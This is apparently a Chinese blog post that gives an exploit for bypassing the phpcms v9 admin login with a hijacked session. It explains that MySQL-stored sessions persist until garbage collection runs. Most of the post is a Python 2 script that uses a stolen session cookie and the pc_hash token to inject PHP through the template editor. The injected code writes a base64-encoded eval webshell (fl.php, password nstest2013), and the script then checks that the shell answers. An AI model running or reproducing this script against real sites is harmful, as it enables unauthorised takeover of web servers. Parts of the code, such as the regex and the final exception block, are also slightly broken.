phpcmsv9后台登录绕过

(在注入出的hash无法破解的情况下)
phpcmsv9在数据库中存储着session

<?php
return array(
//网站路径
'web_path' => '/phpcms/install_package/',
//Session配置
'session_storage' => 'mysql',
'session_ttl' => 1800,
'session_savepath' => CACHE_PATH.'sessions/',
'session_n' => 0,
//Cookie配置
'cookie_domain' => '', //Cookie 作用域
'cookie_path' => '', //Cookie 作用路径
'cookie_pre' => 'MydlE_', //Cookie 前缀，同一域名下安装多套系统时，请修改Cookie前缀
'cookie_ttl' => 0, //Cookie 生命周期，0 表示随浏览器进程
//模板相关配置
'tpl_root' => 'templates/', //模板保存物理路径
'tpl_name' => 'default', //当前模板方案目录
'tpl_css' => 'default', //当前样式目录
'tpl_referesh' => 1,
'tpl_edit'=>1,//是否允许在线编辑模板

默认是mysql方式存储，session的有效期默认为30分钟。
/phpcms/libs/classes/session_mysql.class.php

    public function __construct() {
                $this->db = pc_base::load_model('session_model');
                $this->lifetime = pc_base::load_config('system','session_ttl');
            session_set_save_handler(array(&$this,'open'), array(&$this,'close'), array(&$this,'read'), array(&$this,'write'), array(&$this,'destroy'), array(&$this,'gc'));
            session_start();
    }
…….

    public function destroy($id) {
                return $this->db->delete(array('sessionid'=>$id));
    }
/**
 * 删除过期的 session
 * 
 * @param $maxlifetime 存活期时间
 * @return bool
 */
   public function gc($maxlifetime) {
                $expiretime = SYS_TIME - $maxlifetime;
                return $this->db->delete("`lastvisit`<$expiretime");
    }
}

这里只要触发了gc session就会被更新，如果超时了就删除。

来看看哪里会触发gc
/phpcms/modules/member/index.php

private function _session_start() {
        $session_storage = 'session_'.pc_base::load_config('system','session_storage');
        pc_base::load_sys_class($session_storage);
}

前台注册 登录 后台登录都会触发gc操作。所以如果管理没有注销的情况，没人访问触发这些操作的情况下，就算过了半小时，session也不会消失，任然能拿shell。如果session无效，可以通过脚本20分钟监测一次，看是否有效，然后getshell。
Python写的getshell的脚本

#! /usr/bin/env python
import urllib2,re
#code by 花开、若相惜
#PaxMac Team

url=raw_input('input your attack url: ')
CmsCookie="PHPSESSID=18iigb6m80nrl1v7u5h53v7km3"#change here
response = urllib2.Request(url+'/index.php?m=admin') 
response.add_header('Cookie',CmsCookie)
response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
attck = urllib2.urlopen(response)
#print attck.read()

pattern = re.compile('pc_hash=w{6}', re.I)   
match = pattern.search(attck.read())
if match:
    hashkey=match.group()
    print "I Got pc_hash :"+hashkey

attck.close()

print "Start getshell..."
data="code=%3C%3Fphp+fputs(fopen(base64_decode(ZmwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW25zdGVzdDIwMTNdKTsgPz4x))%3B%3F%3E%0D%0A%7Btemplate+
%27member%27%2C+%27header%27%7D%0D%0A%3Cdiv+id%3D%22memberArea%22%3E%0D%0A%7Btemplate+%27member%27%2C+%27left%27%7D%0D%0A%3Cdiv+class%3D%22
col-auto%22%3E%0D%0A%3Cdiv+class%3D%22col-1+%22%3E%0D%0A%3Ch6+class%3D%22title%22%3E%E6%B6%88%E8%B4%B9%E8%AE%B0%E5%BD%95%3C%2Fh6%3E%0D%0A%3Cdiv+
class%3D%22content%22%3E%0D%0A%3Cform+name%3D%22searchform%22+action%3D%22%7BAPP_PATH%7Dindex.php%3Fm%3Dpay%26c%3Dspend_list%26a%3Dinit%22+
method%3D%22get%22+%3E%0D%0A%3Cinput+type%3D%22hidden%22+value%3D%22pay%22+name%3D%22m%22%3E%0D%0A%3Cinput+type%3D%22hidden%22+
value%3D%22spend_list%22+name%3D%22c%22%3E%0D%0A%3Cinput+type%3D%22hidden%22+value%3D%22init%22+name%3D%22a%22%3E%0D%0A%09%09%3Cdiv+
class%3D%22search%22%3E%0D%0A%09%09%E8%AE%A2%E5%8D%95%E6%97%B6%E9%97%B4++%7Bform%3A%3Adate%28%27starttime%27%2Cformat%3A%3Adate%28%24starttime%29%29%7D
+%E5%88%B0+++%7Bform%3A%3Adate%28%27endtime%27%2Cformat%3A%3Adate%28%24endtime%29%29%7D%0D%0A%09%09%7Bform%3A%3A
select%28array%28%27%27%3D%3E%27%E6%B6%88%E8%B4%B9%E7%B1%BB%E5%9E%8B%27%2C+%271%27%3D%3E%27%E9%87%91%E9%92%B1%27%2C+%272%27%3D%3E%27%E7%A7%AF%E5%88%86%27%29%2C%24
type%2C%27name%3D%22type%22%27%29%7D++%0D%0A%09%09%3Cinput+type%3D%22submit%22+value%3D%22%E6%9F%A5%E8%AF%A2%22+class%3D%22button%22+name%3D%22
dosubmit%22%3E%0D%0A%09%09%3C%2Fdiv%3E%0D%0A%3C%2Fform%3E%0D%0A%3Ctable+width%3D%22100%25%22+cellspacing%3D%220%22++
class%3D%22table-list%22%3E%0D%0A++++++++%3Cthead%3E%0D%0A++++++++++++
%3Ctr%3E%0D%0A++++++++++++%3Cth+width%3D%2220%25%22%3E%E6%B6%88%E8%B4%B9%E5%86%85%E5%AE%B9%3C%2Fth%3E%0D%0A++++++++++++
%3Cth+width%3D%2220%25%22%3E%E6%97%B6%E9%97%B4%3C%2Fth%3E%0D%0A++++++++++++%3Cth+width%3D%2215%25%22%3E%E6%B6%88%E8%B4%B9%E7%B1%BB%E5%9E%8B%3C%2Fth%3E%0D%0A
++++++++++++%3Cth+width%3D%228%25%22%3E%E6%95%B0%E9%87%8F%3C%2Fth%3E%0D%0A++++++++++++%3C%2Ftr%3E%0D%0A++++++++%3C%2Fthead%3E%0D%0A++++
%3Ctbody%3E%0D%0A%09%7Bloop+%24list+%24info%7D+%0D%0A%09%3Ctr%3E%0D%0A%09%3Ctd+width%3D%2220%25%22+align%3D%22center%22%3E%7B%24info%5B%27msg%27%5D%7D%3C
%2Ftd%3E%0D%0A%09%3Ctd++width%3D%2220%25%22+align%3D%22center%22%3E%7Bformat%3A%3Adate%28%24info%5B%27creat_at%27%5D%2C+1%29%7D%3C%2Ftd%3E%0D%0A%09%3Ctd+
width%3D%2215%25%22+align%3D%22center%22%3E%7Bif+%24info%5Btype%5D%3D%3D1%7D%E9%87%91%E9%92%B1%7Belseif+%24info%5Btype%5D%3D%3D2%7D%E7%A7%AF%E5%88%86%7B%2F
if%7D%3C%2Ftd%3E%0D%0A%09%3Ctd+width%3D%228%25%22+align%3D%22center%22%3E%7B%24info%5B%27value%27%5D%7D%3C%2Ftd%3E%0D%0A%09%3C%2Ftr%3E%0D%0A%09%7B%2Floop%7D%0D%0A
++++%3C%2Ftbody%3E%0D%0A++++%3C%2Ftable%3E%0D%0A%0D%0A+%3Cdiv+id%3D%22pages%22%3E+%7B%24pages%7D%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cspan+
class%3D%22o1%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o2%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o3%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o4%22%3E%3C%2Fspan%3E%0D%0A%3C%2F
div%3E%0D%0A%0D%0A%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%7Btemplate+%27member%27%2C+%27footer%27%7D%0D%0A&dosubmit=%E6%8F%90%E4%BA%A4&"+hashkey
response = urllib2.Request(url+'/index.php?m=template&c=file&a=edit_file&style=default&dir=pay&file=spend_list.html',data) 
response.add_header('Cookie',CmsCookie)
response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
attck = urllib2.urlopen(response)
#print attck.read()

attck.close()

response = urllib2.Request(url+'/index.php?m=template&c=file&a=visualization&style=default&dir=pay&file=spend_list.html&'+hashkey)
response.add_header('Cookie',CmsCookie)
response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
attck = urllib2.urlopen(response)

attck.close()
try:
    response = urllib2.Request(url+'/fl.php')
    response.add_header('Cookie',CmsCookie)
    response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
    attck = urllib2.urlopen(response)
    if str(attck.read())=="1":
        print "Webshell :"+url+'/fl.php'+" "+"password:nstest2013"
    else:
        print "Failed!"
    attck.close()
except urllib2.HTTPError, e:
print e.code

作者：花开、若相惜
博主提醒：此Exp需要更改cookies，注册会员时需自行抓包。